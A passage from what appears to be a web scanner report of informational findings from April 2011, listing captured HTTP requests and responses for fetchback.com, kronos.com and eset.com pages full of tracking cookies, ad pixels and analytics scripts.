Set-Cookie: kwd=1_1303744437_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: sit=1_1303744437_719:0:0_2451:52865:47765_3236:210828:210710_782:565114:564765; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: cre=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: bpd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: apd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: scg=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: ppd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: afl=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:13:58 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418


<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<![endif]>





<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>



<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>

<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment" width="1" height="1" />
</noscript>


<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment" width="1" height="1" />
</noscript
...[SNIP]...

Request 2

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303744445_1437:0_1660:564773; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: uid=1_1303744445_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: kwd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: sit=1_1303744445_719:0:0_2451:52873:47773_3236:210836:210718_782:565122:564773; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: cre=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: bpd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: apd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: scg=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: ppd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: afl=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:14:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2488


<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<![endif]>

<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">

<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>



<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>

<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">

<img src="http://ad.bannerconnect.net/pixel?id=495608&t=2" width="1" height="1" />

<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1" width="1" height="1" border="0" >
<img src="http://ad.adtegrity.net/pixel?id=494024&t=2" width="1" height="1" />

<img src="http://ad.yieldmanager.com/pixel?id=478454&t=2" width="1" height="1" />



<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1801246;dcnet=4591;boom=23534;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src
...[SNIP]...

20.2. http://solutions.kronos.com/content/experience2011 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://solutions.kronos.com
Path:	/content/experience2011

Request 1

GET /content/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:36 GMT
Content-Length: 15646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=07f4199a-e2e3-4df4-8cd3-81c0c6bfdbf6&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fwww.kronos.com%2f&elq_ck=0" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=07f4199a-e2e3-4df4-8cd3-81c0c6bfdbf6&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fwww.kronos.com%2f&elq_ck=0" border=0 width=1 height=1 >');
}
-->
</script>

Request 2

GET /content/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:55:26 GMT
Content-Length: 15576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=5c7c78e8-9c2a-422e-971f-b2e7b77b3a37&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=5c7c78e8-9c2a-422e-971f-b2e7b77b3a37&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0" border=0 width=1 height=1 >');
}
-->
</script>

20.3. http://www.eset.com/us/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/

Request 1

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:16:46 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:16:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26704
Date: Mon, 25 Apr 2011 15:16:47 GMT
X-Varnish: 555652739
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
<script type="text/javascript">
   mboxDefine('','home_ticker_clicked');
       function ticker_Log(URL)
       {
           var mboxDestination = ("Destination="+URL);
           mboxUpdate('home_ticker_clicked',mboxDestination);
       }
</script>

Request 2

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:17:20 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:17:21 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:17:21 GMT
X-Varnish: 555654547
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
<script type="text/javascript">
   mboxDefine('','home_ticker_clicked');
       function ticker_Log(URL)
       {
           var mboxDestination = ("Destination="+URL);
           mboxUpdate('home_ticker_clicked',mboxDestination);
       }
</script>

20.4. http://www.eset.com/us/business/products previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/business/products

Request 1

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/server-security/linux-file
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21118
Date: Mon, 25 Apr 2011 12:58:53 GMT
X-Varnish: 1310977832
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/server-security/linux-file";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:59:04 GMT
X-Varnish: 1310978379
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.5. http://www.eset.com/us/business/server-security/linux-file previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/business/server-security/linux-file

Request 1

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17290
Date: Mon, 25 Apr 2011 12:58:48 GMT
X-Varnish: 1310977676
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17208
